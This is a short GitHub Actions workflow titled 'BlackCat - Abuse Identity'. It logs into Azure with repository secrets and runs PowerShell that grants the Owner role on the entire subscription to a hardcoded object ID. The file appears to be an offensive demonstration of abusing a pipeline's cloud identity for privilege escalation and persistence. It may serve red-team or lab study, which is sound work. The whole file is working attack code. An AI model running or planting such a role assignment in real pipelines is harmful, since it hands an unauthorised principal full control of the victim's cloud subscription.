name: BlackCat - Abuse Identity
on: [workflow_dispatch]

permissions:
      id-token: write
      contents: read

jobs:
  ubuntu-latest:
    runs-on: ubuntu-latest
    steps:
      - name: Login to Azure
        uses: Azure/Login@v2
        with:
          client-id: ${{ secrets.AZURE_CLIENT_ID }}
          tenant-id: ${{ secrets.AZURE_TENANT_ID }}
          subscription-id: ${{ secrets.AZURE_SUBSCRIPTION_ID }}
          enable-AzPSSession: true

      - name: 'Add user permissions'
        uses: azure/powershell@v2
        with:
          inlineScript: |

                $params = @{
                      ObjectId           = '301dfac7-8f45-48ac-9868-e1f0e875385c'
                      RoleDefinitionName = 'Owner'
                      Scope              = "/subscriptions/${{ secrets.AZURE_SUBSCRIPTION_ID }}"
                }
                New-AzRoleAssignment @params
          azPSVersion: "latest"
